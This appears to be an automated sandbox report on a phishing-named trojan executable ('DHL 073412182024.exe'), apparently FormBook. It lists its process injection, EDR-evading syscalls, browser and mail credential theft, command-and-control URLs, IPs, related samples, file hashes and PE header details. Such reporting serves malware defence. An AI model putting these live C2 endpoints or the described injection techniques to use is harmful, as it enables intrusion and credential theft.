            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578019 Sample: DHL 073412182024.exe Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 31 www.joyesi.xyz 2->31 33 www.techchains.info 2->33 35 16 other IPs or domains 2->35 39 Suricata IDS alerts for network traffic 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Antivirus detection for URL or domain 2->43 47 7 other signatures 2->47 10 DHL 073412182024.exe 2 2->10         started        signatures3 45 Performs DNS queries to domains with low reputation 31->45 process4 signatures5 57 Binary is likely a compiled AutoIt script file 10->57 59 Writes to foreign memory regions 10->59 61 Maps a DLL or memory area into another process 10->61 13 svchost.exe 10->13         started        process6 signatures7 63 Maps a DLL or memory area into another process 13->63 16 ihoQcJjaPvtmjn.exe 13->16 injected process8 dnsIp9 25 www.rssnewscast.com 91.195.240.94, 49968, 49978, 49984 SEDO-ASDE Germany 16->25 27 elettrosistemista.zip 195.110.124.133, 50020, 50021, 50022 REGISTER-ASIT Italy 16->27 29 5 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 netbtugc.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            DHL 073412182024.exe57%VirustotalBrowse
            DHL 073412182024.exe58%ReversingLabsWin32.Trojan.AutoitInject
            DHL 073412182024.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://www.3xfootball.com/fo8o/?K8tpX=HvRPZ2CX3&Sj=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?Sj=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&K8tpX=HvRPZ2CX30%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?Sj=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&K8tpX=HvRPZ2CX3100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?K8tpX=HvRPZ2CX3&Sj=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=100%Avira URL Cloudmalware
            http://www.goldenjade-travel.com/fo8o/?K8tpX=HvRPZ2CX3&Sj=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=100%Avira URL Cloudmalware
            https://www.empowermedeco.com/fo8o/?Sj=mxnR0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            195.110.124.133
            truefalse
              high
              empowermedeco.com
              217.196.55.202
              truefalse
                high
                www.3xfootball.com
                154.215.72.110
                truefalse
                  high
                  www.goldenjade-travel.com
                  116.50.37.244
                  truefalse
                    high
                    www.rssnewscast.com
                    91.195.240.94
                    truefalse
                      high
                      www.techchains.info
                      66.29.149.46
                      truefalse
                        high
                        natroredirect.natrocdn.com
                        85.159.66.93
                        truefalse
                          high
                          www.magmadokum.com
                          unknown
                          unknownfalse
                            high
                            www.donnavariedades.com
                            unknown
                            unknownfalse
                              high
                              www.660danm.top
                              unknown
                              unknownfalse
                                high
                                www.joyesi.xyz
                                unknown
                                unknownfalse
                                  high
                                  www.liangyuen528.com
                                  unknown
                                  unknownfalse
                                    high
                                    www.kasegitai.tokyo
                                    unknown
                                    unknownfalse
                                      high
                                      www.empowermedeco.com
                                      unknown
                                      unknownfalse
                                        high
                                        www.k9vyp11no3.cfd
                                        unknown
                                        unknownfalse
                                          high
                                          www.elettrosistemista.zip
                                          unknown
                                          unknownfalse
                                            high
                                            www.antonio-vivaldi.mobi
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.3xfootball.com/fo8o/?K8tpX=HvRPZ2CX3&Sj=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=true
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.rssnewscast.com/fo8o/?Sj=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&K8tpX=HvRPZ2CX3true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.goldenjade-travel.com/fo8o/?K8tpX=HvRPZ2CX3&Sj=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=true
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://www.empowermedeco.com/fo8o/false
                                                high
                                                http://www.elettrosistemista.zip/fo8o/false
                                                  high
                                                  http://www.empowermedeco.com/fo8o/?Sj=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&K8tpX=HvRPZ2CX3true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.magmadokum.com/fo8o/false
                                                    high
                                                    http://www.rssnewscast.com/fo8o/false
                                                      high
                                                      http://www.elettrosistemista.zip/fo8o/?K8tpX=HvRPZ2CX3&Sj=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=true
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      http://www.goldenjade-travel.com/fo8o/false
                                                        high
                                                        http://www.techchains.info/fo8o/false
                                                          high
                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.empowermedeco.comihoQcJjaPvtmjn.exe, 00000002.00000002.4190913591.0000000008E0D000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.ecosia.org/newtab/netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.00000000074DE000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.000000000465E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4182597345.0000000006520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.sedo.com/services/parking.php3netbtugc.exe, 00000003.00000002.4182597345.0000000006520000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.empowermedeco.com/fo8o/?Sj=mxnRihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007E4A000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004FCA000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://codepen.io/uzcho_/pens/popular/?grid_type=listihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007802000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004982000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                              high
                                                                              https://codepen.io/uzcho_/pen/eYdmdXw.cssihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.0000000007802000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000004982000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000003.00000002.4182804836.0000000007FAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    91.195.240.94
                                                                                    www.rssnewscast.comGermany
                                                                                    47846SEDO-ASDEfalse
                                                                                    154.215.72.110
                                                                                    www.3xfootball.comSeychelles
                                                                                    132839POWERLINE-AS-APPOWERLINEDATACENTERHKfalse
                                                                                    195.110.124.133
                                                                                    elettrosistemista.zipItaly
                                                                                    39729REGISTER-ASITfalse
                                                                                    116.50.37.244
                                                                                    www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                    18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                    85.159.66.93
                                                                                    natroredirect.natrocdn.comTurkey
                                                                                    34619CIZGITRfalse
                                                                                    66.29.149.46
                                                                                    www.techchains.infoUnited States
                                                                                    19538ADVANTAGECOMUSfalse
                                                                                    217.196.55.202
                                                                                    empowermedeco.comNorway
                                                                                    29300AS-DIRECTCONNECTNOfalse
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1578019
                                                                                    Start date and time:2024-12-19 06:40:06 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 11m 19s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:8
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:1
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:DHL 073412182024.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/3@15/7
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 92%
                                                                                    • Number of executed functions: 48
                                                                                    • Number of non-executed functions: 299
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    00:41:54API Interceptor12775006x Sleep call for process: netbtugc.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    91.195.240.94236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • suboyule.736t.com/
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                    Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.3xfootball.comDHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 20156-2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKhttp://93287.mobiGet hashmaliciousUnknownBrowse
                                                                                    • 154.203.26.164
                                                                                    la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.253.231.231
                                                                                    loligang.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.227.181.218
                                                                                    2.elfGet hashmaliciousUnknownBrowse
                                                                                    • 156.242.243.23
                                                                                    sh4.elfGet hashmaliciousUnknownBrowse
                                                                                    • 45.202.220.151
                                                                                    armv4l.elfGet hashmaliciousMiraiBrowse
                                                                                    • 154.201.227.218
                                                                                    rebirth.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 160.124.155.145
                                                                                    rebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.89.221.223
                                                                                    elitebotnet.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 156.242.21.125
                                                                                    nshsh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.234.143
                                                                                    REGISTER-ASITDHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 195.110.124.133
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                    • 195.110.124.133
                                                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 195.110.124.133
                                                                                    S#U0130PAR#U0130#U015e No.112024-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 195.110.124.133
                                                                                    SEDO-ASDE236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 11-21AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 1045-20-11.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 719A1120-2024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 91.195.240.94
                                                                                    No context
                                                                                    No context
                                                                                    Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                    Category:dropped
                                                                                    Size (bytes):114688
                                                                                    Entropy (8bit):0.9746603542602881
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\Desktop\DHL 073412182024.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.994490461614035
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:+QxgklcNaI2wm635KhgHsG5M5nGQh/8vs48GR:+ETI2b63QG0Gdvt8a
                                                                                    MD5:105181EA781BEEDCF50D31559A403358
                                                                                    SHA1:1BD4C929840FB5B69DDAADE88149A1155F9D5A6F
                                                                                    SHA-256:91C8FB3B52DC657EEA3035BC5278E00A58370C17C6FF51C5ECA2F85B0F68C693
                                                                                    SHA-512:FD54BABACD0CEAC356D8D1229B538D98B0ECD2FBF2C7323FBE648CEE36291FB79530648C5C04AE7946845B38433D8B605AD3AA0F2B4F48F2354349133F61E95F
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...`.70Z3...X...}.AR...I:..Z3HI8QLD2VALAQANKWJ2F70Z3HI8QL.2VAB^.ON.^...6|...!Q"l4@9&> <a-*9$]2.R?.:<Vq%*....a<.*.yG?L.0Z3HI8Q5E;.|,&.|.,.wR!.*...sX6.^...p!6.T....&P..Z+!.1+.2VALAQAN..J2.61Z. .gQLD2VALA.ALJ\K9F7 ^3HI8QLD2V.YAQA^KWJ.B70ZsHI(QLD0VAJAQANKWJ4F70Z3HI8qHD2TALAQANIW..F7 Z3XI8QLT2VQLAQANKGJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VAb549:KWJ.I30Z#HI8AHD2FALAQANKWJ2F70Z.HIXQLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI
                                                                                    Process:C:\Users\user\Desktop\DHL 073412182024.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):270848
                                                                                    Entropy (8bit):7.994490461614035
                                                                                    Encrypted:true
                                                                                    SSDEEP:6144:+QxgklcNaI2wm635KhgHsG5M5nGQh/8vs48GR:+ETI2b63QG0Gdvt8a
                                                                                    MD5:105181EA781BEEDCF50D31559A403358
                                                                                    SHA1:1BD4C929840FB5B69DDAADE88149A1155F9D5A6F
                                                                                    SHA-256:91C8FB3B52DC657EEA3035BC5278E00A58370C17C6FF51C5ECA2F85B0F68C693
                                                                                    SHA-512:FD54BABACD0CEAC356D8D1229B538D98B0ECD2FBF2C7323FBE648CEE36291FB79530648C5C04AE7946845B38433D8B605AD3AA0F2B4F48F2354349133F61E95F
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:...`.70Z3...X...}.AR...I:..Z3HI8QLD2VALAQANKWJ2F70Z3HI8QL.2VAB^.ON.^...6|...!Q"l4@9&> <a-*9$]2.R?.:<Vq%*....a<.*.yG?L.0Z3HI8Q5E;.|,&.|.,.wR!.*...sX6.^...p!6.T....&P..Z+!.1+.2VALAQAN..J2.61Z. .gQLD2VALA.ALJ\K9F7 ^3HI8QLD2V.YAQA^KWJ.B70ZsHI(QLD0VAJAQANKWJ4F70Z3HI8qHD2TALAQANIW..F7 Z3XI8QLT2VQLAQANKGJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VAb549:KWJ.I30Z#HI8AHD2FALAQANKWJ2F70Z.HIXQLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI8QLD2VALAQANKWJ2F70Z3HI
                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Entropy (8bit):7.134406913933576
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:DHL 073412182024.exe
                                                                                    File size:1'249'792 bytes
                                                                                    MD5:9ad73be33f667e2400dab66ba0c20058
                                                                                    SHA1:c8aef0388f3a85183cfa8aeeb24a3bf9b1ce9053
                                                                                    SHA256:4d63883ce64474b643f30b2e3e3876710a92a861c52a1a452c4d86955d1b5f1e
                                                                                    SHA512:feade77066893c02bbf2e0b4f73e44c31ec1f88246921cf8560bb6a51fa2ca022d6bd968ee93461eee42b4bb079e19d0e5f464bcc2a9fd158a4d983e08f1689b
                                                                                    SSDEEP:24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8aXjNny4IlIBgc:DTvC/MTQYxsWR7aXjNnyRp
                                                                                    TLSH:8445C00273D1C062FFAB92734F9AF6115BBC69260123A61F13A81DB9BD701B1563E763
                                                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                    Entrypoint:0x420577
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6762B313 [Wed Dec 18 11:33:39 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:5
                                                                                    OS Version Minor:1
                                                                                    File Version Major:5
                                                                                    File Version Minor:1
                                                                                    Subsystem Version Major:5
                                                                                    Subsystem Version Minor:1
                                                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                                                    Instruction
                                                                                    call 00007F4370EA16D3h
                                                                                    jmp 00007F4370EA0FDFh
                                                                                    push ebp
                                                                                    mov ebp, esp
                                                                                    push esi
                                                                                    push dword ptr [ebp+08h]
                                                                                    mov esi, ecx
                                                                                    call 00007F4370EA11BDh
                                                                                    mov dword ptr [esi], 0049FDF0h
                                                                                    mov eax, esi
                                                                                    pop esi
